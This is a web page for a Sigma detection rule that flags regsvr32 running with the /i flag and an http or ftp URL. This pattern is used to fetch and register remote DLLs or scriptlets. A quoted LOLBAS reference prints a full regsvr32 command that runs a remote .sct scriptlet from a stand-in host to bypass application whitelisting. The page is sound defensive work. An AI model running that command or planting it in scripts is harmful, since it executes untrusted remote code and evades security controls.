Potentially Suspicious Regsvr32 HTTP/FTP Pattern
Detects regsvr32 execution to download/install/register new DLLs that are hosted on Web or FTP servers.
Sigma rule (View on GitHub)
1title: Potentially Suspicious Regsvr32 HTTP/FTP Pattern
2id: 867356ee-9352-41c9-a8f2-1be690d78216
3related:
4 - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d
5 type: obsoletes
6status: test
7description: Detects regsvr32 execution to download/install/register new DLLs that are hosted on Web or FTP servers.
8references:
9 - https://twitter.com/mrd0x/status/1461041276514623491
10 - https://twitter.com/tccontre18/status/1480950986650832903
11 - https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/
12author: Florian Roth (Nextron Systems)
13date: 2023/05/24
14modified: 2023/05/26
15tags:
16 - attack.defense_evasion
17 - attack.t1218.010
18logsource:
19 category: process_creation
20 product: windows
21detection:
22 selection_img:
23 - Image|endswith: '\regsvr32.exe'
24 - OriginalFileName: 'REGSVR32.EXE'
25 selection_flag:
26 CommandLine|contains:
27 - ' /i'
28 - ' -i'
29 selection_protocol:
30 CommandLine|contains:
31 - 'ftp'
32 - 'http'
33 condition: all of selection_*
34falsepositives:
35 - Unknown
36level: medium
References
-
-
-
Execute the specified remote .SCT script with scrobj.dll. regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll Use caseExecute code from remote scriptlet, bypass Application whitelisting Pri...
Read More
Related rules
- Potentially Suspicious Child Process Of Regsvr32
- Potentially Suspicious Regsvr32 HTTP IP Pattern
- Regsvr32 DLL Execution With Suspicious File Extension
- Regsvr32 Execution From Highly Suspicious Location
- Regsvr32 Execution From Potential Suspicious Location